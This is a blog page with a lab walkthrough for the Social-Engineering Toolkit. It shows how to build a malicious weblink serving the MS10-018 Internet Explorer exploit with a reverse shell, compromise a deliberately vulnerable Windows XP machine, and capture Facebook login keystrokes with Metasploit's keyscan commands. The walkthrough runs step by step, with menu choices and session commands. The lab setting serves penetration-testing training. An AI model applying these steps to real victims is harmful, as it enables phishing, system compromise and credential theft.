Chuyển đến nội dung chính

Hướng Dẫn Thực Hành - (Social Engineering Toolkit (SET): Lesson 2

{ Create Malicious Weblink to Sniff Victim's Keystrokes }
Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
    • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
  • Social Engineering Note
    • Image an attacker embedding the malicious link   in an email to a possible victim.
    • The Victim does not inspect the link before he clicks on it to notice that the link is an IP Address instead of a domain name.  In addition the IP Address is listening on a different port. 
      • (ie., http://192.168.1.105:8080) 
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the following has occurred:
      1. A Metasploit payload was injected to their system
      2. A Metasploit session is attached to their system
      3. The attached session was migrated from iexplorer.exe to notpad.exe.
Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player
  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings
  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine
  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.
  3. Bring up the GNOME
    • Instructions:
      1. Type startx

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal
  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set
  2. Website Attack Vector
    • Instructions:
      1. Select 2
  3. Select Metasploit Browser Exploit Method
    • Instructions:
      1. Select 2
  4. Select Web Templates
    • Instructions:
      1. Select 1
  5. Set Web Attack
    • Instructions:
      1. Select 3
  6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
    • Instructions:
      1. Select 15
  7. Windows Shell Reverse_TCP
    • Instructions:
      1. Select 1
  8. Set Reverse Port
    • Instructions:
      1. Set to 5555
  9. Waiting for the server to start
    • Instructions:
      1. Copy the weblink that is listed above the Server started line.
      2. Continue to the next section.
    • Notes:
      • This is the malicious weblink that will be used by the attacker to to social engineer their way into the victim's machine.

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Image how an attacker could embed the malicious link provided in Section 4, Step 9 in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain Damn Vulnerable WXP-SP2's IP Address
    • Instructions:
      1. ipconfig
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
      • Record your Damn Vulnerable WXP-SP2's IP Address.
     
Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Victim Clicks on Link
    • Instructions:
      1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, get the IP address from Section 5, Step 9.
    • Note(FYI):
      • The Web Browser will just crash.

Section 7. Analyzing Results After Web Browser Crash
  1. Start up a Command Prompt
    • Instructions:
      1. All Programs --> Accessories --> Command Prompt
  2. Start up a Command Prompt
    • Instructions:
      1. netstat -nao | findstr 5555
      2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
      3. tasklist | findstr notepad
    • Proof of Lab Instructions: (có thể bỏ qua bước này)
      1. date
      2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "Nguyen Tuong Minh"
      3. Do a PrtScn
      4. Paste into a word document

Section 8. Entering the Victim's Machine
  1. Get a MSF Prompt
    • Instructions:
      1. Press <Enter>, when you see the notepad.exe line.
  2. Obtain the Victim's Command Prompt
    • Instructions:
      1. sessions
      2. sessions -i 1
      3. execute -f cmd.exe -i -M
  3. Start the keystroke sniffer
    • Instructions:
      1. Press the <Ctrl> and "z" key at the same time.
        • This will put session 1 into the background.
      2. y
      3. keyscan_start
      4. Continue to next Section.

Section 9. Login to Facebook
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
     
  2. Login into Facebook
    • Instructions:
      1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
      2. Password: Use whatever you want.

Section 10. Review sniffed keystrokes
  1. Exit Web Attack Menu
    • Instructions:
      1. keyscan_dump
        • This will proceduce the Facebook
      2. keyscan_stop
    • Proof of Lab Instructions #2:
      1. Do a PrtScan
      2. Paste into same word document that contains proof of lab #1.

 
Nhãn:

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...
Đọc thêm

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...
Đọc thêm

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...
Đọc thêm